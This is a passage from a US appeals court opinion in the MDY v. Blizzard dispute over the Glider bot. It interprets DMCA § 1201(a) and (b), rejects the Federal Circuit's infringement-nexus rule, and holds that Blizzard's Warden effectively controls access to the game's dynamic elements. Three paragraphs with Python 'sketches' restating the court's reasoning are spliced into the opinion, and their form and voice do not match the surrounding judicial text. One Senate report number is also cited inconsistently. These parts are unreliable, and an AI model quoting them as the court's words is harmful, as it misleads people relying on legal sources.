cumvention under § 1201(a) — descrambling a scrambled
work and decrypting an encrypted work — are acts that do
not necessarily infringe or facilitate infringement of a copy-
right.6 Descrambling or decrypting only enables someone to
watch or listen to a work without authorization, which is not
necessarily an infringement of a copyright owner’s traditional
exclusive rights under § 106. Put differently, descrambling
and decrypting do not necessarily result in someone’s repro-
ducing, distributing, publicly performing, or publicly display-
ing the copyrighted work, or creating derivative works based
on the copyrighted work.
The third significant difference between the subsections is
that § 1201(a)(1)(A) prohibits circumventing an effective
access control measure, whereas § 1201(b) prohibits traffick-
ing in circumventing devices, but does not prohibit circum-
vention itself because such conduct was already outlawed as
copyright infringement. The Senate Judiciary Committee
explained:
This . . . is the reason there is no prohibition on con-
duct in 1201(b) akin to the prohibition on circum-
vention conduct in 1201(a)(1). The prohibition in
1201(a)(1) is necessary because prior to this Act, the
conduct of circumvention was never before made
unlawful. The device limitation on 1201(a)(2)
enforces this new prohibition on conduct. The copy-
right law has long forbidden copyright infringe-
ments, so no new prohibition was necessary.
S. Rep. No. 105-90, at 11 (1998). This difference reinforces
our reading of § 1201(b) as strengthening copyright owners’
traditional rights against copyright infringement and of
6 Perhaps for this reason, Congress did not list descrambling and decryp-
ting as circumventing acts that would violate § 1201(b)(1). See 17 U.S.C.
§ 1201(b)(2)(A).
§ 1201(a) as granting copyright owners a new anti-
circumvention right.
Fourth, in § 1201(a)(1)(B)-(D), Congress directs the
Library of Congress (“Library”) to identify classes of copy-
righted works for which “noninfringing uses by persons who
are users of a copyrighted work are, or are likely to be,
adversely affected, and the [anti-circumvention] prohibition
contained in [§ 1201(a)(1)(A)] shall not apply to such users
with respect to such classes of works for the ensuing 3-year
period.” There is no analogous provision in § 1201(b). We
impute this lack of symmetry to Congress’ need to balance
copyright owners’ new anti-circumvention right with the pub-
lic’s right to access the work. Cf. H.R. Rep. No. 105-551, pt.
2, at 26 (1998) (specifying that the House Commerce Com-
mittee “endeavored to specify, with as much clarity as possi-
ble, how the right against anti-circumvention (sic) would be
qualified to maintain balance between the interests of content
creators and information users.”). Sections 1201(a)(1)(B)-(D)
thus promote the public’s right to access by allowing the
Library to exempt circumvention of effective access control
measures in particular situations where it concludes that the
public’s right to access outweighs the owner’s interest in
restricting access.7 In limiting the owner’s right to control
access, the Library does not, and is not permitted to, authorize
infringement of a copyright owner’s traditional exclusive
rights under the copyright. Rather, the Library is only entitled
to moderate the new anti-circumvention right created by, and
hence subject to the limitations in, DMCA § 1201(a)(1).8
7 For instance, pursuant to § 1201(a), the Library of Congress recently
approved circumvention of the technological measures contained on the
iPhone and similar wireless phone handsets known as “smartphones,” in
order to allow users to install and run third-party software applications on
these phones. See http://www.copyright.gov/fedreg/2010/75fr43825.pdf.
8 In addition to these four textual differences, we note that § 1201(a)(2)
prohibits the circumvention of “a technological measure,” and
§ 1201(b)(1) prohibits the circumvention “of protection afforded by a
technological measure.” In our view, these terms have the same meaning,
given the presumption that a “legislative body generally uses a particular
word with a consistent meaning in a given context.” Graham County Soil
& Water Conservation Dist. v. United States ex rel. Wilson, 130 S. Ct.
1396 (2010) (quoting Erlenbaugh v. United States, 409 U.S. 239, 243
(1972)) (internal quotation marks omitted).
Our reading of §§ 1201(a) and (b) ensures that neither sec-
tion is rendered superfluous. A violation of § 1201(a)(1)(A),
which prohibits circumvention itself, will not be a violation of
§ 1201(b), which does not contain an analogous prohibition
on circumvention. A violation of § 1201(a)(2), which prohib-
its trafficking in devices that facilitate circumvention of
access control measures, will not always be a violation of
§ 1201(b)(1), which prohibits trafficking in devices that facili-
tate circumvention of measures that protect against copyright
infringement. Of course, if a copyright owner puts in place an
effective measure that both (1) controls access and (2) pro-
tects against copyright infringement, a defendant who traffics
in a device that circumvents that measure could be liable
under both §§ 1201(a) and (b). Nonetheless, we read the dif-
ferences in structure between §§ 1201(a) and (b) as reflecting
Congress’s intent to address distinct concerns by creating dif-
ferent rights with different elements.
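The harmonization just described has a simple logical shape:
which trafficking claims are available depends on which kind of
measure the accused device circumvents. A minimal Python sketch
of that structure follows; it restates the court's reading only
schematically, and the function and parameter names are invented
for illustration, not drawn from the statute.

    # Schematic restatement of the court's reading of the two
    # trafficking provisions; names are illustrative only.

    def trafficking_claims(controls_access: bool,
                           protects_106_right: bool) -> set:
        """Which provisions a trafficked circumvention device may implicate.

        controls_access:    the measure "effectively controls access."
        protects_106_right: the measure "effectively protects" a right
                            under 17 U.S.C. 106.
        """
        claims = set()
        if controls_access:
            claims.add("1201(a)(2)")  # new anti-circumvention right
        if protects_106_right:
            claims.add("1201(b)(1)")  # reinforces traditional 106 rights
        return claims

    # A measure that both controls access and protects against
    # infringement can support liability under both subsections.
    print(trafficking_claims(True, True))    # both claims
    print(trafficking_claims(True, False))   # only 1201(a)(2)
    print(trafficking_claims(False, False))  # no trafficking claim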
3. Our construction of the DMCA is consistent with the
legislative history
Although the text suffices to resolve the issues before us,
we also consider the legislative history in order to address the
parties’ arguments concerning it. Our review of that history
supports the view that Congress created a new anti-
circumvention right in § 1201(a)(2) independent of traditional
copyright infringement and granted copyright owners a new
weapon against copyright infringement in § 1201(b)(1). For
instance, the Senate Judiciary Committee report explains that
§§ 1201(a)(2) and (b)(1) are “not interchangeable”: they were
“designed to protect two distinct rights and to target two dis-
tinct classes of devices,” and “many devices will be subject
to challenge only under one of the subsections.” S. Rep. No.
105-190, at 12 (1998). That is, § 1201(a)(2) “is designed to
protect access to a copyrighted work,” while § 1201(b)(1) “is
designed to protect the traditional copyright rights of the
copyright owner.” Id. Thus, the Senate Judiciary Committee
understood § 1201 to create the following regime:
[I]f an effective technological protection measure
does nothing to prevent access to the plain text of the
work, but is designed to prevent that work from
being copied, then a potential cause of action against
the manufacturer of a device designed to circumvent
the measure lies under § 1201(b)(1), but not under
§ 1201(a)(2). Conversely, if an effective technologi-
cal protection measure limits access to the plain text
of a work only to those with authorized access, but
provides no additional protection against copying,
displaying, performing or distributing the work, then
a potential cause of action against the manufacturer
of a device designed to circumvent the measure lies
under § 1201(a)(2), but not under § 1201(b).
Id. The Senate Judiciary Committee proffered an example of
§ 1201(a) liability with no nexus to infringement, stating that
if an owner effectively protected access to a copyrighted work
by use of a password, it would violate § 1201(a)(2)(A)
[T]o defeat or bypass the password and to make the
means to do so, as long as the primary purpose of the
means was to perform this kind of act. This is
roughly analogous to making it illegal to break into
a house using a tool, the primary purpose of which
is to break into houses.
Id. at 12. The House Judiciary Committee similarly states of
§ 1201(a)(2), “The act of circumventing a technological pro-
tection measure put in place by a copyright owner to control
access to a copyrighted work is the electronic equivalent of
breaking into a locked room in order to obtain a copy of a
book.” See H.R. Rep. No. 105-551, pt. 1, at 17 (1998). We
note that bypassing a password and breaking into a locked
room in order to read or view a copyrighted work would not
infringe on any of the copyright owner’s exclusive rights
under § 106.
We read this legislative history as confirming Congress’s
intent, in light of the current digital age, to grant copyright
owners an independent right to enforce the prohibition against
circumvention of effective technological access controls.9 In
§ 1201(a), Congress was particularly concerned with encour-
aging copyright owners to make their works available in digi-
tal formats such as “on-demand” or “pay-per-view,” which
allow consumers effectively to “borrow” a copy of the work
for a limited time or a limited number of uses. As the House
Commerce Committee explained:
[A]n increasing number of intellectual property
works are being distributed using a “client-server”
model, where the work is effectively “borrowed” by
the user (e.g., infrequent users of expensive software
purchase a certain number of uses, or viewers watch
a movie on a pay-per-view basis). To operate in this
environment, content providers will need both the
technology to make new uses possible and the legal
framework to ensure they can protect their work
from piracy.
9 Indeed, the House Commerce Committee proposed, albeit unsuccess-
fully, to move § 1201 out of Title 17 altogether “because these regulatory
provisions have little, if anything, to do with copyright law. The anti-
circumvention provisions (and the accompanying penalty provisions for
violations of them) would be separate from, and cumulative to, the exist-
ing claims available to copyright owners.” H.R. Rep. No. 105-551 (1998),
pt. 2, at 23-24.
See H.R. Rep. No. 105-551 pt. 2, at 23 (1998).
[15] Our review of the legislative history supports our
reading of § 1201: that section (a) creates a new anti-
circumvention right distinct from copyright infringement,
while section (b) strengthens the traditional prohibition
against copyright infringement.10 We now review the deci-
sions of the Federal Circuit that have interpreted § 1201 dif-
ferently.
4. The Federal Circuit’s decisions
The Federal Circuit has adopted a different approach to the
DMCA. In essence, it requires § 1201(a) plaintiffs to demon-
strate that the circumventing technology infringes or facili-
tates infringement of the plaintiff’s copyright (an
“infringement nexus requirement”). See Chamberlain Group,
Inc. v. Skylink Techs., Inc., 381 F.3d 1178, 1203 (Fed. Cir.
2004); Storage Tech. Corp. v. Custom Hardware Eng’g Con-
sulting, Inc., 421 F.3d 1307 (Fed. Cir. 2005).11
The seminal decision is Chamberlain, 381 F.3d 1178 (Fed.
Cir. 2004). In Chamberlain, the plaintiff sold garage door
10 The Copyright Office has also suggested that § 1201(a) creates a new
access control right independent from copyright infringement, by express-
ing its view that the fair use defense to traditional copyright infringement
does not apply to violations of § 1201(a)(1). U.S. Copyright Office, The
Digital Millennium Copyright Act of 1998: U.S. Copyright Office Sum-
mary 4 (1998), available at http://www.copyright.gov/legislation/dmca.pdf
(“Since the fair use doctrine is not a defense to the act of gaining unautho-
rized access to a work, the act of circumventing a technological measure
in order to gain access is prohibited.”).
11 The Fifth Circuit in its subsequently withdrawn opinion in MGE UPS
Systems, Inc. v. GE Consumer and Industrial, Inc., 95 U.S.P.Q.2d 1632,
1635 (5th Cir. 2010), embraced the Federal Circuit’s approach in Cham-
berlain. However, its revised opinion, 622 F.3d (5th Cir. Sept. 20, 2010),
avoids the issue by determining that MGE had not shown circumvention
of its software protections. Notably, the revised opinion does not cite
Chamberlain.
openers (“GDOs”) with a “rolling code” security system that
purportedly reduced the risk of crime by constantly changing
the transmitter signal necessary to open the door. Id. at 1183.
Customers used the GDOs’ transmitters to send the changing
signal, which in turn opened or closed their garage doors. Id.
Plaintiff sued the defendant, who sold “universal” GDO trans-
mitters for use with plaintiff’s GDOs, under § 1201(a)(2). Id.
at 1185. The plaintiff alleged that its GDOs
and transmitters both contained copyrighted computer pro-
grams and that its rolling code security system was a techno-
logical measure that controlled access to those programs. Id.
at 1183. Accordingly, plaintiff alleged that the defendant —
by selling GDO transmitters that were compatible with plain-
tiff’s GDOs — had trafficked in a technology that was pri-
marily used for the circumvention of a technological measure
(the rolling code security system) that effectively controlled
access to plaintiff’s copyrighted works. Id.
The Federal Circuit rejected the plaintiff’s claim, holding
that the defendant did not violate § 1201(a)(2) because, inter
alia, the defendant’s universal GDO transmitters did not
infringe or facilitate infringement of the plaintiff’s copy-
righted computer programs. Id. at 1202-03. The linchpin of
the Chamberlain court’s analysis is its conclusion that DMCA
coverage is limited to a copyright owner’s rights under the
Copyright Act as set forth in § 106 of the Copyright Act. Id.
at 1192-93. Thus, it held that § 1201(a) did not grant copy-
right owners a new anti-circumvention right, but instead,
established new causes of action for a defendant’s unautho-
rized access of copyrighted material when it infringes upon a
copyright owner’s rights under § 106. Id. at 1192, 1194.
Accordingly, a § 1201(a)(2) plaintiff was required to demon-
strate a nexus to infringement — i.e., that the defendant’s traf-
ficking in circumventing technology had a “reasonable
relationship” to the protections that the Copyright Act affords
copyright owners. Id. at 1202-03. The Federal Circuit
explained:
Defendants who traffic in devices that circumvent
access controls in ways that facilitate infringement
may be subject to liability under § 1201(a)(2).
Defendants who use such devices may be subject to
liability under § 1201(a)(1) whether they infringe or
not. Because all defendants who traffic in devices
that circumvent rights controls necessarily facilitate
infringement, they may be subject to liability under
§ 1201(b). Defendants who use such devices may be
subject to liability for copyright infringement. And
finally, defendants whose circumvention devices do
not facilitate infringement are not subject to § 1201
liability.
Id. at 1195 (emphasis added). Chamberlain concluded that
§ 1201(a) created a new cause of action linked to copyright
infringement, rather than a new anti-circumvention right sepa-
rate from copyright infringement, for six reasons.
First, Chamberlain reasoned that Congress enacted the
DMCA to balance the interests of copyright owners and infor-
mation users, and an infringement nexus requirement was
necessary to create an anti-circumvention right that truly
achieved that balance. Id. at 1196 (citing H.R. Rep. No. 105-
551, at 26 (1998)). Second, Chamberlain feared that copy-
right owners could use an access control right to prohibit
exclusively fair uses of their material even absent feared foul
use. Id. at 1201. Third, Chamberlain feared that § 1201(a)
would allow companies to leverage their sales into aftermar-
ket monopolies, in potential violation of antitrust law and the
doctrine of copyright misuse. Id. (citing Eastman Kodak Co.
v. Image Tech. Servs., 504 U.S. 451, 455 (1992) (antitrust);
Assessment Techs. of WI, LLC v. WIREdata, Inc., 350 F.3d
640, 647 (7th Cir. 2003) (copyright misuse)). Fourth, Cham-
berlain viewed an infringement nexus requirement as neces-
sary to prevent “absurd and disastrous results,” such as the
existence of DMCA liability for disabling a burglary alarm to
gain access to a home containing copyrighted materials. Id.
Fifth, Chamberlain stated that an infringement nexus
requirement might be necessary to render Congress’s exercise
of its Copyright Clause authority rational. Id. at 1200. The
Copyright Clause gives Congress “the task of defining the
scope of the limited monopoly that should be granted to
authors . . . in order to give the public appropriate access to
their work product.” Id. (citing Eldred v. Ashcroft, 537 U.S.
186, 204-05 (2003) (internal citation omitted)). Without an
infringement nexus requirement, Congress arguably would
have allowed copyright owners in § 1201(a) to deny all access
to the public by putting an effective access control measure in
place that the public was not allowed to circumvent.
Finally, the Chamberlain court viewed an infringement
nexus requirement as necessary for the Copyright Act to be
internally consistent. It reasoned that § 1201(c)(1), enacted
simultaneously, provides that “nothing in this section shall
affect rights, remedies, limitations, or defenses to copyright
infringement, including fair use, under this title.” The Cham-
berlain court opined that if § 1201(a) creates liability for
access without regard to the remainder of the Copyright Act,
it “would clearly affect rights and limitations, if not remedies
and defenses.” Id.
Accordingly, the Federal Circuit held that a DMCA
§ 1201(a)(2) action was foreclosed to the extent that the
defendant trafficked in a device that did not facilitate copy-
right infringement. Id.; see also Storage Tech., 421 F.3d 1307
(same).
5. We decline to adopt an infringement nexus requirement
[16] While we appreciate the policy considerations
expressed by the Federal Circuit in Chamberlain, we are
unable to follow its approach because it is contrary to the
plain language of the statute. In addition, the Federal Circuit
failed to recognize the rationale for the statutory construction
that we have proffered. Also, its approach is based on policy
concerns that are best directed to Congress in the first
instance, or for which there appear to be other reasons that do
not require such a convoluted construction of the statute’s lan-
guage.
i. Statutory inconsistencies
Were we to follow Chamberlain in imposing an infringe-
ment nexus requirement, we would have to disregard the plain
language of the statute. Moreover, there is significant textual
evidence showing Congress’s intent to create a new anti-
circumvention right in § 1201(a) distinct from infringement.
As set forth supra, this evidence includes: (1) Congress’s
choice to link only § 1201(b)(1) explicitly to infringement; (2)
Congress’s provision in § 1201(a)(3)(A) that descrambling
and decrypting devices can lead to § 1201(a) liability, even
though descrambling and decrypting devices may only enable
non-infringing access to a copyrighted work; and (3) Con-
gress’s creation of a mechanism in § 1201(a)(1)(B)-(D) to
exempt certain non-infringing behavior from § 1201(a)(1) lia-
bility, a mechanism that would be unnecessary if an infringe-
ment nexus requirement existed.
Though unnecessary to our conclusion because of the clar-
ity of the statute’s text, see United States v. Gallegos, 613
F.3d 1211, 1214 (9th Cir. 2010), we also note that the legisla-
tive history supports the conclusion that Congress intended to
prohibit even non-infringing circumvention and trafficking in
circumventing devices. Moreover, in mandating a § 1201(a)
nexus to infringement, we would deprive copyright owners of
the important enforcement tool that Congress granted them to
make sure that they are compensated for valuable non-
infringing access — for instance, copyright owners who make
movies or music available online, protected by an access con-
trol measure, in exchange for direct or indirect payment.
The Chamberlain court reasoned that if § 1201(a) creates
liability for access without regard to the remainder of the
Copyright Act, it “would clearly affect rights and limitations,
if not remedies and defenses.” 381 F.3d at 1200. This per-
ceived tension is relieved by our recognition that § 1201(a)
creates a new anti-circumvention right distinct from the tradi-
tional exclusive rights of a copyright owner. It follows that
§ 1201(a) does not limit the traditional framework of exclu-
sive rights created by § 106, or defenses to those rights such
as fair use.12 We are thus unpersuaded by Chamberlain’s read-
ing of the DMCA’s text and structure.
ii. Additional interpretive considerations
Though we need no further evidence of Congress’s intent,
the parties, citing Chamberlain, proffer several other argu-
ments, which we review briefly in order to address the par-
ties’ contentions. Chamberlain relied heavily on policy
considerations to support its reading of § 1201(a). As a
threshold matter, we stress that such considerations cannot
trump the statute’s plain text and structure. Gallegos, 613
F.3d at 1214. Even were they permissible considerations in
this case, however, they would not persuade us to adopt an
infringement nexus requirement. Chamberlain feared that
§ 1201(a) would allow companies to leverage their sales into
aftermarket monopolies, in tension with antitrust law and the
doctrine of copyright misuse.13 Id. (citing Eastman, 504 U.S.
at 455 (antitrust); Assessment Techs., 350 F.3d at 647 (copy-
12 Like the Chamberlain court, we need not and do not reach the rela-
tionship between fair use under § 107 of the Copyright Act and violations
of § 1201. Chamberlain, 381 F.3d at 1199 n.14. MDY has not claimed that
Glider use is a “fair use” of WoW’s dynamic non-literal elements. Accord-
ingly, we too leave open the question whether fair use might serve as an
affirmative defense to a prima facie violation of § 1201. Id.
13 Copyright misuse is an equitable defense to copyright infringement
that denies the copyright holder the right to enforce its copyright during
the period of misuse. Practice Mgmt. Info. Corp v. Am. Med. Ass’n, 121
F.3d 516, 520 (9th Cir. 1997). Since we have held that § 1201(a) creates
a right distinct from copyright infringement, we conclude that we need not
address copyright misuse in this case.
right misuse)). Concerning antitrust law, we note that there is
no clear issue of anti-competitive behavior in this case
because Blizzard does not seek to put a direct competitor who
offers a competing role-playing game out of business and the
parties have not argued this issue. If a § 1201(a)(2) defendant
in a future case claims that a plaintiff is attempting to enforce
its DMCA anti-circumvention right in a manner that violates
antitrust law, we will then consider the interplay between this
new anti-circumvention right and antitrust law.
Chamberlain also viewed an infringement nexus require-
ment as necessary to prevent “absurd and disastrous results,”
such as the existence of DMCA liability for disabling a bur-
glary alarm to gain access to a home containing copyrighted
materials. 381 F.3d at 1201. In addition, the Federal Circuit
was concerned that, without an infringement nexus require-
ment, § 1201(a) would allow copyright owners to deny all
access to the public by putting an effective access control
measure in place that the public is not allowed to circumvent.
381 F.3d at 1200. Both concerns appear to be overstated,14 but
even accepting them, arguendo, as legitimate concerns, they
do not permit reading the statute as requiring the imposition
of an infringement nexus. As § 1201(a) creates a distinct
right, it does not disturb the balance between public rights and
the traditional rights of owners of copyright under the Copy-
right Act. Moreover, § 1201(a)(1)(B)-(D) allows the Library
of Congress to create exceptions to the § 1201(a) anti-
circumvention right in the public’s interest. If greater protec-
14 The Chamberlain court’s assertion that the public has a constitutional
right to appropriately access copyright works during the copyright term,
381 F.3d at 1200, cited Eldred v. Ashcroft, 537 U.S. 186, 204-05 (2003).
The Eldred decision, however, was quoting the Supreme Court’s previous
decision in Sony Corp. of America v. Universal City Studios, Inc., which
discussed the public’s right of access after the copyright term. 464 U.S.
417, 429 (1984) (“[T]he limited grant [of copyright] . . . is intended to
motivate the creative activity of authors and inventors by the provision of
a special reward, and to allow the public access to the products of their
genius after the limited period of exclusive control has expired.”).
tion of the public’s ability to access copyrighted works is
required, Congress can provide such protection by amending
the statute.
In sum, we conclude that a fair reading of the statute (sup-
ported by legislative history) indicates that Congress created
a distinct anti-circumvention right under § 1201(a) without an
infringement nexus requirement. Thus, even accepting the
validity of the concerns expressed in Chamberlain, those con-
cerns do not authorize us to override congressional intent and
add a non-textual element to the statute. See In Re Dumont,
581 F.3d 1104, 1111 (9th Cir. 2009) (“[W]here the language
of an enactment is clear or, in modern parlance, plain, and
construction according to its terms does not lead to absurd or
impracticable consequences, the words employed are to be
taken as the final expression of the meaning intended.”).
Accordingly, we reject the imposition of an infringement
nexus requirement. We now consider whether MDY has vio-
lated §§ 1201(a)(2) and (b)(1).
E. Blizzard’s § 1201(a)(2) claim
1. WoW’s literal elements and individual non-literal
elements
[17] We agree with the district court that MDY’s Glider
does not violate DMCA § 1201(a)(2) with respect to WoW’s
literal elements15 and individual non-literal elements, because
Warden does not effectively control access to these WoW ele-
ments. First, Warden does not control access to WoW’s literal
elements because these elements — the game client’s soft-
ware code — are available on a player’s hard drive once the
game client software is installed. Second, as the district court
found:
15 We also agree with the district court that there are no genuine issues
of material fact on Blizzard’s § 1201(a)(2) claim regarding WoW’s literal
elements.
[WoW’s] individual nonliteral components may be
accessed by a user without signing on to the server.
As was demonstrated during trial, an owner of the
game client software may use independently pur-
chased computer programs to call up the visual
images or the recorded sounds within the game client
software. For instance, a user may call up and listen
to the roar a particular monster makes within the
game. Or the user may call up a virtual image of that
monster.
Since a player need not encounter Warden to access WoW’s
individual non-literal elements, Warden does not effectively
control access to those elements.
Our conclusion is in accord with the Sixth Circuit’s deci-
sion in Lexmark International v. Static Control Components,
387 F.3d 522 (6th Cir. 2004). In Lexmark, the plaintiff sold
laser printers equipped with an authentication sequence, veri-
fied by the printer’s copyrighted software, that ensured that
only plaintiff’s own toner cartridges could be inserted into the
printers. Id. at 530. The defendant sold microchips capable of
generating an authentication sequence that rendered other
manufacturers’ cartridges compatible with plaintiff’s printers.
Id.
The Sixth Circuit held that plaintiff’s § 1201(a)(2) claim
failed because its authentication sequence did not effectively
control access to its copyrighted computer program. Id. at
546. Rather, the mere purchase of one of plaintiff’s printers
allowed “access” to the copyrighted program. Any purchaser
could read the program code directly from the printer memory
without encountering the authentication sequence. Id. The
authentication sequence thus blocked only one form of access:
the ability to make use of the printer. However, it left intact
another form of access: the review and use of the computer
program’s literal code. Id. The Sixth Circuit explained:
Just as one would not say that a lock on the back
door of a house “controls access” to a house whose
front door does not contain a lock and just as one
would not say that a lock on any door of a house
“controls access” to the house after its purchaser
receives the key to the lock, it does not make sense
to say that this provision of the DMCA applies to
otherwise-readily-accessible copyrighted works. Add
to this the fact that the DMCA not only requires the
technological measure to “control access” but
requires the measure to control that access “effec-
tively,” 17 U.S.C. § 1201(a)(2), and it seems clear
that this provision does not naturally extend to a
technological measure that restricts one form of
access but leaves another route wide open.
Id. at 547.
[18] Here, a player’s purchase of the WoW game client
allows access to the game’s literal elements and individual
non-literal elements. Warden blocks one form of access to
these elements: the ability to access them while connected to
a WoW server. However, analogously to the situation in Lex-
mark, Warden leaves open the ability to access these elements
directly via the user’s computer. We conclude that Warden is
not an effective access control measure with respect to
WoW’s literal elements and individual non-literal elements,
and therefore, that MDY does not violate § 1201(a)(2) with
respect to these elements.
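The Lexmark analogy just applied reduces to a simple
effectiveness test: a measure “effectively controls access” only
if it gates the routes by which the work can actually be
reached, and a measure that leaves another route wide open
fails. The Python sketch below encodes only that schematic
point; the route names are invented labels, not terms from
either case.

    # Schematic version of the Lexmark "wide open route" point.
    # Route names are hypothetical labels for illustration.

    def effectively_controls_access(gated: set, all_routes: set) -> bool:
        """A measure is 'effective' here only if every route to the work
        passes through it; one ungated route defeats effectiveness."""
        return all_routes <= gated

    # Lexmark: the authentication sequence gated printer use, but the
    # program code could be read directly from printer memory.
    print(effectively_controls_access(
        {"use the printer"},
        {"use the printer", "read code from printer memory"}))      # False

    # WoW's literal and individual non-literal elements: Warden gates
    # online play, but these elements remain on the player's hard drive.
    print(effectively_controls_access(
        {"play on Blizzard servers"},
        {"play on Blizzard servers", "read files on hard drive"}))  # False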
2. WoW’s dynamic non-literal elements
[19] We conclude that MDY meets each of the six textual
elements for violating § 1201(a)(2) with respect to WoW’s
dynamic non-literal elements. That is, MDY (1) traffics in (2)
a technology or part thereof (3) that is primarily designed,
produced, or marketed for, or has limited commercially sig-
nificant use other than (4) circumventing a technological mea-
sure (5) that effectively controls access (6) to a copyrighted
work. See 17 U.S.C. § 1201(a)(2).
The first two elements are met because MDY “traffics in a
technology or part thereof” — that is, it sells Glider. The third
and fourth elements are met because Blizzard has established
that MDY markets Glider for use in circumventing Warden,
thus satisfying the requirement of § 1201(a)(2)(C).16 Indeed,
Glider has no function other than to facilitate the playing of
WoW. The sixth element is met because, as the district court
held, WoW’s dynamic non-literal elements constitute a copy-
righted work. See, e.g., Atari Games Corp. v. Oman, 888 F.2d
878, 884-85 (D.C. Cir. 1989) (the audiovisual display of a
computer game is copyrightable independently from the soft-
ware program code, even though the audiovisual display gen-
erated is partially dependent on user input).
16 To “circumvent a technological measure” under § 1201(a) means to
“descramble a scrambled work, to decrypt an encrypted work, or other-
wise to avoid, bypass, remove, deactivate, or impair a technological mea-
sure, without the authority of the copyright owner.” 17 U.S.C.
§ 1201(a)(3)(A) (emphasis added). A circuit split exists with respect to the
meaning of the phrase “without the authority of the copyright owner.” The
Federal Circuit has concluded that this definition imposes an additional
requirement on a § 1201(a)(2) plaintiff: to show that the defendant’s cir-
cumventing device enables third parties to access the copyrighted work
without the copyright owner’s authorization. See Chamberlain, 381 F.3d
at 1193. The Second Circuit has adopted a different view, explaining that
§ 1201(a)(3)(A) plainly exempts from § 1201(a) liability those whom a
copyright owner authorizes to circumvent an access control measure, not
those whom a copyright owner authorizes to access the work. Corley, 273
F.3d at 444 & n.15; see also 321 Studios v. MGM Studios, Inc., 307 F.
Supp. 2d 1085, 1096 (N.D. Cal. 2004) (same).
We find the Second Circuit’s view to be the sounder construction of the
statute’s language, and conclude that § 1201(a)(2) does not require a plain-
tiff to show that the accused device enables third parties to access the
work without the copyright owner’s authorization. Thus, Blizzard has sat-
isfied the “circumvention” element of a § 1201(a)(2) claim, because Bliz-
zard has demonstrated that it did not authorize MDY to circumvent
Warden.
[20] The fifth element is met because Warden is an effec-
tive access control measure. To “effectively control access to
a work,” a technological measure must “in the ordinary course
of its operation, require[ ] the application of information, or
a process or a treatment, with the authority of the copyright
owner, to gain access to the work.” 17 U.S.C.
§ 1201(a)(3)(B). Both of Warden’s two components “re-
quire[ ] the application of information, or a process or a treat-
ment . . . to gain access to the work.” For a player to connect
to Blizzard’s servers which provide access to WoW’s
dynamic non-literal elements, scan.dll must scan the player’s
computer RAM and confirm the absence of any bots or
cheats. The resident component also requires a “process” in
order for the user to continue accessing the work: the user’s
computer must report portions of WoW code running in RAM
to the server. Moreover, Warden’s provisions were put into
place by Blizzard, and thus, function “with the authority of
the copyright owner.” Accordingly, Warden effectively con-
trols access to WoW’s dynamic non-literal elements.17 We
hold that MDY is liable under § 1201(a)(2) with respect to
WoW’s dynamic non-literal elements.18 Accordingly, we
affirm the district court’s entry of a permanent injunction
against MDY to prevent future § 1201(a)(2) violations.
17 The statutory definition of the phrase “effectively control access to a
work” does not require that an access control measure be strong or
circumvention-proof. Rather, it requires an access control measure to pro-
vide some degree of control over access to a copyrighted work. As one
district court has observed, if the word “effectively” were read to mean
that the statute protects “only successful or efficacious technological
means of controlling access,” it would “gut” DMCA § 1201(a)(2), because
it would “limit the application of the statute to access control measures
that thwart circumvention, but withhold protection for those measures that
can be circumvented.” See Universal City Studios v. Reimerdes, 111 F.
Supp. 2d 294, 318 (S.D.N.Y. 2000) (“Defendants would have the Court
construe the statute to offer protection where none is needed but to with-
hold protection precisely where protection is essential.”).
18 We note that the DMCA allows innocent violators to seek reduction
or remittance of damages. See 17 U.S.C. § 1203(c)(5).
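Pulling this subsection together: liability under § 1201(a)(2)
is the conjunction of the six textual elements enumerated above,
and the court's differing results for WoW's element types turn
on element (5). The sketch below is only an illustrative
encoding of those findings as booleans, not a legal test
generator; the labels paraphrase the opinion's enumeration.

    # Illustrative encoding of the six 1201(a)(2) elements as applied to
    # Glider and Warden; the boolean findings restate this opinion.

    ELEMENTS = [
        ("traffics in",                           True),  # MDY sells Glider
        ("a technology or part thereof",          True),
        ("primarily designed/marketed for",       True),  # 1201(a)(2)(C)
        ("circumventing a technological measure", True),  # avoids Warden
        ("that effectively controls access",      True),  # 1201(a)(3)(B)
        ("to a copyrighted work",                 True),  # dynamic elements
    ]

    def liable(elements) -> bool:
        """All six textual elements must be met."""
        return all(found for _, found in elements)

    print(liable(ELEMENTS))  # True: dynamic non-literal elements

    # For WoW's literal and individual non-literal elements, element (5)
    # fails, so there is no 1201(a)(2) liability as to those elements.
    literal = [(name, ok and i != 4) for i, (name, ok) in enumerate(ELEMENTS)]
    print(liable(literal))   # False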
F. Blizzard’s § 1201(b)(1) claim
[21] Blizzard may prevail under § 1201(b)(1) only if War-
den “effectively protect[s] a right” of Blizzard under the
Copyright Act. Blizzard contends that Warden protects its
reproduction right against unauthorized copying. We disagree.
First, although WoW players copy the software code into
RAM while playing the game, Blizzard’s EULA and ToU
authorize all licensed WoW players to do so. We have
explained that ToU § 4(B)’s bot prohibition is a license cove-
nant rather than a condition. Thus, a Glider user who violates
this covenant does not infringe by continuing to copy code
into RAM. Accordingly, MDY does not violate § 1201(b)(1)
by enabling Glider users to avoid Warden’s interruption of
their authorized copying into RAM.
[22] Second, although WoW players can theoretically
record game play by taking screen shots, there is no evidence
that Warden detects or prevents such allegedly infringing copy-
ing.19 This is logical, because Warden was designed to reduce
the presence of cheats and bots, not to protect WoW’s
dynamic non-literal elements against copying. We conclude
that Warden does not effectively protect any of Blizzard’s
rights under the Copyright Act, and MDY is not liable under
§ 1201(b)(1) for Glider’s circumvention of Warden.20
19 No evidence establishes that Glider users engage in this practice, and
Glider itself does not provide a software mechanism for taking screenshots
or otherwise reproducing copyrighted WoW material.
20 The district court permanently enjoined “MDY and Michael Donnelly
from engaging in contributory or vicarious copyright infringement and
from violating the DMCA with respect to Blizzard’s copyrights in and
rights to” WoW. Because we conclude that MDY is not liable under
§ 1201(b)(1), we vacate the aspect of the permanent injunction dealing
with MDY’s and Donnelly’s § 1201(b)(1) liability.
VI.
The district court granted Blizzard summary judgment on
its claim against MDY for tortious interference with contract
(“tortious interference”) under Arizona law and held that
Donnelly was personally liable for MDY’s tortious interfer-
ence. We review the district court’s grant of summary judg-
ment de novo. See Canyon Ferry Rd. Baptist Church of East
Helena, Inc. v. Unsworth, 556 F.3d 1021, 1027 (9th Cir.
2009). We view the evidence in the light most favorable to
non-movant MDY in determining whether there are any genu-
ine issues of material fact. Id. Because we conclude that there
are triable issues of material fact, we vacate and remand for
trial.
A. Elements of Blizzard’s tortious interference claim
To recover for tortious interference under Arizona law,
Blizzard must prove: (1) the existence of a valid contractual
relationship; (2) MDY’s knowledge of the relationship; (3)
MDY’s intentional interference in inducing or causing the
